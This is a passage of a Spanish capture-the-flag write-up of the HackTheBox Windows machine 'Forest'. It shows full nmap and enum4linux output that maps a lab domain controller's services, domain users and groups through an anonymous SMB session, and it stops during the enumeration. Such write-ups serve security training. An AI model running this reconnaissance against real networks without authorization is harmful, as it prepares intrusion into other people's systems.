Forest es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad fácil.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Forest 10.10.10.161 a /etc/hosts como forest.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 |
# Nmap 7.70 scan initiated Sat Jan 11 20:02:43 2020 as: nmap -A -sV -p- -oA nmapinitial forest.htb Nmap scan report for forest.htb (10.10.10.161) Host is up (0.12s latency). Not shown: 989 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? | fingerprint-strings: | DNSVersionBindReqTCP: | version |_ bind 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-11 20:17:20Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49675/tcp open msrpc Microsoft Windows RPC 49682/tcp open msrpc Microsoft Windows RPC 49701/tcp open msrpc Microsoft Windows RPC 49913/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.70%I=7%D=1/11%Time=5E1A2BBB%P=x86_64-pc-linux-gnu%r(DNSV SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\ SF:x04bind\0\0\x10\0\x03"); No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.70%E=4%D=1/11%OT=53%CT=1%CU=41431%PV=Y%DS=2%DC=T%G=Y%TM=5E1A2CD OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=106%CI=RD%II=I%TS=A)SEQ(SP= OS:100%GCD=1%ISR=106%TI=RD%CI=RD%II=I%TS=A)SEQ(SP=FF%GCD=1%ISR=106%TS=A)SEQ OS:(SP=100%GCD=1%ISR=106%II=I%TS=A)SEQ(SP=FD%GCD=1%ISR=105%TI=RD%TS=B)OPS(O OS:1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST OS:11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R OS:=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS% OS:RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W= OS:0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5 OS:(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF= OS:N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80% OS:CD=Z) Network Distance: 2 hops Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h46m51s, deviation: 4h37m11s, median: 6m48s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: FOREST | NetBIOS computer name: FOREST\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: FOREST.htb.local |_ System time: 2020-01-11T12:20:19-08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: required | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2020-01-11 20:20:14 |_ start_date: 2020-01-11 19:59:28 TRACEROUTE (using port 3306/tcp) HOP RTT ADDRESS 1 65.81 ms 10.10.14.1 2 101.20 ms forest.htb (10.10.10.161) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jan 11 20:15:25 2020 -- 1 IP address (1 host up) scanned in 762.20 seconds |
Descubrimos que existen varios puertos abiertos. Desde el resultado del anterior escaner observamos que posiblemente exista un controlador de dominio bajo el dominio “htb.local“. Los servidores de dominio como kerberos, ldap, SMB y el puerto de WinRm están abiertos y accesibles desde internet, lo que supone una gran vulnerabilidad.
Dicho esto, vamos a utilizar una herramienta de enumeración llamada enum4linux para ver si podemos obtener información de los usuarios y de otros dominios existentes.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 |
$ enum4linux -a 10.10.10.161 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jan 12 10:57:57 2020 ========================== | Target Information | ========================== Target ........... 10.10.10.161 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 10.10.10.161 | ==================================================== [E] Can't find workgroup/domain ============================================ | Nbtstat Information for 10.10.10.161 | ============================================ Looking up status of 10.10.10.161 No reply from 10.10.10.161 ===================================== | Session Check on 10.10.10.161 | ===================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 437. [+] Server 10.10.10.161 allows sessions using username '', password '' Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 451. [+] Got domain/workgroup name: =========================================== | Getting domain SID for 10.10.10.161 | =========================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 359. Domain Name: HTB Domain Sid: S-1-5-21-3072663084-364016917-1341370565 [+] Host is part of a domain (not a workgroup) ====================================== | OS information on 10.10.10.161 | ====================================== Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 458. Use of uninitialized value $os_info in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 464. [+] Got OS info for 10.10.10.161 from smbclient: Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 467. [+] Got OS info for 10.10.10.161 from srvinfo: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED ============================= | Users on 10.10.10.161 | ============================= Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 866. index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null) index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null) index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system. index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null) index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null) index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null) index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null) index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null) index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null) index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null) index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null) index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null) index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null) index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null) index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null) index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null) index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null) index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null) index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null) index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null) index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null) index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null) index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null) index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null) index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null) index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null) index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null) index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null) Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 883. user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[DefaultAccount] rid:[0x1f7] user:[$331000-VK4ADACQNUCA] rid:[0x463] user:[SM_2c8eef0a09b545acb] rid:[0x464] user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465] user:[SM_75a538d3025e4db9a] rid:[0x466] user:[SM_681f53d4942840e18] rid:[0x467] user:[SM_1b41c9286325456bb] rid:[0x468] user:[SM_9b69f1b9d2cc45549] rid:[0x469] user:[SM_7c96b981967141ebb] rid:[0x46a] user:[SM_c75ee099d0a64c91b] rid:[0x46b] user:[SM_1ffab36a2f5f479cb] rid:[0x46c] user:[HealthMailboxc3d7722] rid:[0x46e] user:[HealthMailboxfc9daad] rid:[0x46f] user:[HealthMailboxc0a90c9] rid:[0x470] user:[HealthMailbox670628e] rid:[0x471] user:[HealthMailbox968e74d] rid:[0x472] user:[HealthMailbox6ded678] rid:[0x473] user:[HealthMailbox83d6781] rid:[0x474] user:[HealthMailboxfd87238] rid:[0x475] user:[HealthMailboxb01ac64] rid:[0x476] user:[HealthMailbox7108a4e] rid:[0x477] user:[HealthMailbox0659cc1] rid:[0x478] user:[sebastien] rid:[0x479] user:[lucinda] rid:[0x47a] user:[svc-alfresco] rid:[0x47b] user:[andy] rid:[0x47e] user:[mark] rid:[0x47f] user:[santi] rid:[0x480] ========================================= | Share Enumeration on 10.10.10.161 | ========================================= Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 640. smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.10.161] do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Sharename Type Comment --------- ---- ------- Error returning browse list: NT_STATUS_REVISION_MISMATCH Reconnecting with SMB1 for workgroup listing. Failed to connect with SMB1 -- no workgroup available [+] Attempting to map shares on 10.10.10.161 ==================================================== | Password Policy Information for 10.10.10.161 | ==================================================== [E] Dependent program "polenum.py" not present. Skipping this check. Download polenum from http://labs.portcullis.co.uk/application/polenum/ ============================== | Groups on 10.10.10.161 | ============================== Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 542. [+] Getting builtin groups: group:[Account Operators] rid:[0x224] group:[Pre-Windows 2000 Compatible Access] rid:[0x22a] group:[Incoming Forest Trust Builders] rid:[0x22d] group:[Windows Authorization Access Group] rid:[0x230] group:[Terminal Server License Servers] rid:[0x231] group:[Administrators] rid:[0x220] group:[Users] rid:[0x221] group:[Guests] rid:[0x222] group:[Print Operators] rid:[0x226] group:[Backup Operators] rid:[0x227] group:[Replicator] rid:[0x228] group:[Remote Desktop Users] rid:[0x22b] group:[Network Configuration Operators] rid:[0x22c] group:[Performance Monitor Users] rid:[0x22e] group:[Performance Log Users] rid:[0x22f] group:[Distributed COM Users] rid:[0x232] group:[IIS_IUSRS] rid:[0x238] group:[Cryptographic Operators] rid:[0x239] group:[Event Log Readers] rid:[0x23d] group:[Certificate Service DCOM Access] rid:[0x23e] group:[RDS Remote Access Servers] rid:[0x23f] group:[RDS Endpoint Servers] rid:[0x240] group:[RDS Management Servers] rid:[0x241] group:[Hyper-V Administrators] rid:[0x242] group:[Access Control Assistance Operators] rid:[0x243] group:[Remote Management Users] rid:[0x244] group:[System Managed Accounts Group] rid:[0x245] group:[Storage Replica Administrators] rid:[0x246] group:[Server Operators] rid:[0x225] [+] Getting builtin group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Group 'System Managed Accounts Group' (RID: 581) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Group 'Guests' (RID: 546) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Group 'Administrators' (RID: 544) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Group 'Remote Management Users' (RID: 580) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Group 'Windows Authorization Access Group' (RID: 560) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Group 'Users' (RID: 545) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Group 'IIS_IUSRS' (RID: 568) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Group 'Account Operators' (RID: 548) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 542. [+] Getting local groups: group:[Cert Publishers] rid:[0x205] group:[RAS and IAS Servers] rid:[0x229] group:[Allowed RODC Password Replication Group] rid:[0x23b] group:[Denied RODC Password Replication Group] rid:[0x23c] group:[DnsAdmins] rid:[0x44d] [+] Getting local group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Group 'Denied RODC Password Replication Group' (RID: 572) has member: Couldn't lookup SIDs Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 574. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 593. [+] Getting domain groups: group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Admins] rid:[0x200] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Domain Controllers] rid:[0x204] group:[Schema Admins] rid:[0x206] group:[Enterprise Admins] rid:[0x207] group:[Group Policy Creator Owners] rid:[0x208] group:[Read-only Domain Controllers] rid:[0x209] group:[Cloneable Domain Controllers] rid:[0x20a] group:[Protected Users] rid:[0x20d] group:[Key Admins] rid:[0x20e] group:[Enterprise Key Admins] rid:[0x20f] group:[DnsUpdateProxy] rid:[0x44e] group:[Organization Management] rid:[0x450] group:[Recipient Management] rid:[0x451] group:[View-Only Organization Management] rid:[0x452] group:[Public Folder Management] rid:[0x453] group:[UM Management] rid:[0x454] group:[Help Desk] rid:[0x455] group:[Records Management] rid:[0x456] group:[Discovery Management] rid:[0x457] group:[Server Management] rid:[0x458] group:[Delegated Setup] rid:[0x459] group:[Hygiene Management] rid:[0x45a] group:[Compliance Management] rid:[0x45b] group:[Security Reader] rid:[0x45c] group:[Security Administrator] rid:[0x45d] group:[Exchange Servers] rid:[0x45e] group:[Exchange Trusted Subsystem] rid:[0x45f] group:[Managed Availability Servers] rid:[0x460] group:[Exchange Windows Permissions] rid:[0x461] group:[ExchangeLegacyInterop] rid:[0x462] group:[$D31000-NSEL5BRJ63V7] rid:[0x46d] group:[Service Accounts] rid:[0x47c] group:[Privileged IT Accounts] rid:[0x47d] group:[test] rid:[0x13ed] [+] Getting domain group memberships: Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$ Group 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Domain Admins' (RID: 512) has member: HTB\Administrator Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Domain Users' (RID: 513) has member: HTB\Administrator Group 'Domain Users' (RID: 513) has member: HTB\DefaultAccount Group 'Domain Users' (RID: 513) has member: HTB\krbtgt Group 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA Group 'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb Group 'Domain Users' (RID: 513) has member: HTB\SM_ca8c2ed5bdab4dc9b Group 'Domain Users' (RID: 513) has member: HTB\SM_75a538d3025e4db9a Group 'Domain Users' (RID: 513) has member: HTB\SM_681f53d4942840e18 Group 'Domain Users' (RID: 513) has member: HTB\SM_1b41c9286325456bb Group 'Domain Users' (RID: 513) has member: HTB\SM_9b69f1b9d2cc45549 Group 'Domain Users' (RID: 513) has member: HTB\SM_7c96b981967141ebb Group 'Domain Users' (RID: 513) has member: HTB\SM_c75ee099d0a64c91b Group 'Domain Users' (RID: 513) has member: HTB\SM_1ffab36a2f5f479cb Group 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc3d7722 Group 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfc9daad Group 'Domain Users' (RID: 513) has member: HTB\HealthMailboxc0a90c9 Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox670628e Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox968e74d Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox6ded678 Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox83d6781 Group 'Domain Users' (RID: 513) has member: HTB\HealthMailboxfd87238 Group 'Domain Users' (RID: 513) has member: HTB\HealthMailboxb01ac64 Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox7108a4e Group 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1 Group 'Domain Users' (RID: 513) has member: HTB\sebastien Group 'Domain Users' (RID: 513) has member: HTB\lucinda Group 'Domain Users' (RID: 513) has member: HTB\svc-alfresco Group 'Domain Users' (RID: 513) has member: HTB\andy Group 'Domain Users' (RID: 513) has member: HTB\mark Group 'Domain Users' (RID: 513) has member: HTB\santi Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Domain Guests' (RID: 514) has member: HTB\Guest Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$ Group 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7 Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$ Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Domain Computers' (RID: 515) has member: HTB\EXCH01$ Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Schema Admins' (RID: 518) has member: HTB\Administrator Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Organization Management' (RID: 1104) has member: HTB\Administrator Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$ Use of uninitialized value $global_workgroup in concatenation (.) or string at /root/github/enum4linux/enum4linux.pl line 614. Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$ Use of uninitialized value $global_workgroup in concatenation (.) or string at 